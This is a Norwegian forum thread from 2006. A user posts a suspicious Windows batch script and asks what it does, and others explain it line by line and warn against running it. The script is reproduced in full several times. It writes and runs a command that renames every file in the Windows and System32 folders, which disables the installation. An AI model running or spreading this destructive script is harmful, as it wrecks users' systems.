RuneScape_Spilleren Skrevet 10. desember 2006 Skrevet 10. desember 2006 (endret) echo off cls echo Injecting... echo ren *.* *.x > %windir%/x.bat echo ren *.* *.x > %windir%/system32/x.bat cd %windir% x.bat cd %windir%/system32 x.bat echo Injected. pause Hva gjør batchen? Veldig redd for å runne den for jeg har opplevd shutdowns som legger seg i oppstarts mappa... Noen som har peiling på hvordan den batchen fungerer? Takker for raske svar! EDIT: @echo off rem Add file to win dir echo Injecting... echo ren *.* *.x > %windir%/x.bat echo ren *.* *.x > %windir%/system32/x.bat rem Execute file cd %windir% x.bat rem Execute backup file cd %windir%/system32 x.bat rem Inform user of success echo Injected. pause Anyone? Endret 10. desember 2006 av RuneScape_Spilleren
no_viking_no Skrevet 10. desember 2006 Skrevet 10. desember 2006 det ser for meg ut at alle filer i Windows og Windows/System32 blir forandret til X files...... REN komando = RENAME (hvis jeg ikke tar feil, det var lenge siden jeg jobbet i DOS) anbefaler ikke å kjøre den filen.....
Hårek Skrevet 10. desember 2006 Skrevet 10. desember 2006 Er ikke så vel bevandret i batch filer, men ser ikke ut som den gjør annet enn å starte x.bat på to steder. Så spørs det hva det står i filen x.bat? 'Ren' kommando står etter 'echo', så den blir ikke utført, bare vist på skjermen.
RuneScape_Spilleren Skrevet 10. desember 2006 Forfatter Skrevet 10. desember 2006 Jeg er ikke flink med dataspråk... Hva betyr dette?
no_viking_no Skrevet 10. desember 2006 Skrevet 10. desember 2006 Er ikke så vel bevandret i batch filer, men ser ikke ut som den gjør annet enn å starte x.bat på to steder. Så spørs det hva det står i filen x.bat?'Ren' kommando står etter 'echo', så den blir ikke utført, bare vist på skjermen. 7470302[/snapback] hvis du ser på denne: ren *.* *.x > %windir%/x.bat i mine øyer er det at du skifter navn til alle filer i Windows DIR til .X files når det gjelder ECHO trodde at REM komando bruker du til dette, å ikke kjøre linje i bat filen. trodde at ECHO og ECHO OFF bare viser og ikke viser på skjermen hva skjer. også hadde du noe med ECHO @, men husker ikke i farta hva det var. og når det gjelder X.bat filen, så er det vel det som han sendte til oss her...... eller er det enda en .bat ?!?!
sim Skrevet 10. desember 2006 Skrevet 10. desember 2006 (endret) echo off cls Clear screen echo Injecting... Skriv «Injecting...» til skjermen echo ren *.* *.x > %windir%/x.bat Skriv «ren *.* *.x» til «%windir%/x.bat» echo ren *.* *.x > %windir%/system32/x.bat Skriv «ren *.* *.x» til «%windir%/system32/x.bat» cd %windir% Skifter mappe til «%windir%» x.bat Kjører x.bat (som ble opprettet tidligere), altså «ren *.* *.x» som vil omdøpe alle filene i %windir% til .x-filer. cd %windir%/system32 Skifter mappe til «%windir%/system32» x.bat Kjører x.bat (som ble opprettet tidligere), altså «ren *.* *.x» som vil omdøpe alle filene i %windir%/system32 til .x-filer. echo Injected. Skriver «Injected.» til skjermen pause Ferdig Ikke kjør denne filen med mindre du ønsker major fuck ups av systemet ditt Endret 10. desember 2006 av sim
Hårek Skrevet 10. desember 2006 Skrevet 10. desember 2006 Tror du har rett, no_viking_no, jeg tok nok feil.
RuneScape_Spilleren Skrevet 10. desember 2006 Forfatter Skrevet 10. desember 2006 echo offcls Clear screen echo Injecting... Skriv «Injecting...» til skjermen echo ren *.* *.x > %windir%/x.bat Skriv «ren *.* *.x» til «%windir%/x.bat» echo ren *.* *.x > %windir%/system32/x.bat Skriv «ren *.* *.x» til «%windir%/system32/x.bat» cd %windir% Skifter mappe til «%windir%» x.bat Kjører x.bat (som ble opprettet tidligere), altså «ren *.* *.x» som vil omdøpe alle filene i %windir% til .x-filer. cd %windir%/system32 Skifter mappe til «%windir%/system32» x.bat Kjører x.bat (som ble opprettet tidligere), altså «ren *.* *.x» som vil omdøpe alle filene i %windir%/system32 til .x-filer. echo Injected. Skriver «Injected.» til skjermen pause Ferdig Ikke kjør denne filen med mindre du ønsker major fuck ups av systemet ditt 7471394[/snapback] Så man herper PC'en?
sim Skrevet 10. desember 2006 Skrevet 10. desember 2006 PC-en blir ikke ødelagt, men det er spørst om Windows-installasjonen din vil fungere like bra etterpå.
no_viking_no Skrevet 10. desember 2006 Skrevet 10. desember 2006 Tror du har rett, no_viking_no, jeg tok nok feil. 7471448[/snapback] alle kan ta feil, you know
vargaz Skrevet 10. desember 2006 Skrevet 10. desember 2006 Kan bli noe trøbbel, men windows repair takler nok dette godt, ellers er det ikke noe problem å ta å starte med sisste fungerene konfigurasjon tipper jeg...
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå